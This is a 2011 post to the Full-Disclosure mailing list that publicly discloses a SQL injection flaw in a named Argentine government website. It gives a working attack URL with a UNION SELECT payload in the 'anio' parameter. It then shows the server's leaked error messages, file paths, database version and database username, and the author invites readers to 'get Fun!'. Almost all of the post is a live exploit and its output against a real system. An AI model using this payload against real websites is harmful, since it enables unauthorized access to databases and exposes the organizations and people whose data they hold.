
Date: Sat, 23 Apr 2011 14:28:09 -0300
From: injec7or hell <injec7or@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: inject sql in mininterior.gov.ar

http://www.mininterior.gov.ar/prensa/prensa_archivo_resultado.php?anio=2010%20union%20select%201,2,@@version,4,5,user--&mes=02&seccion=12&limInf=0

and the answer is ...
*
*
*Warning: mssql_query() [function.mssql-query]: message: Conversion failed
when converting the varchar value 'Agencia Nacional de Seguridad Vial' to
data type int. (severity 16) in /var/www/
mininterior.gov.ar/prensa/prensa_archivo_resultado.php on line 60*
*
*
*Warning: mssql_query() [function.mssql-query]: General SQL Server error:
Check messages from the SQL Server (severity 16) in /var/www/
mininterior.gov.ar/prensa/prensa_archivo_resultado.php on line 60*
*<<<1>>>*
*
*
*1900.01.03 *
*Microsoft SQL Server 2005 - 9.00.3080.00 (Intel X86) Sep 6 2009 01:43:32
Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows
NT 5.2 (Build 3790: Service Pack 2)*
*
*
*UsuarioW3*
*
*
*
*
get Fun!

ps:one inject per day
ps2: has been reported and ignored by "THE" webmaster

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
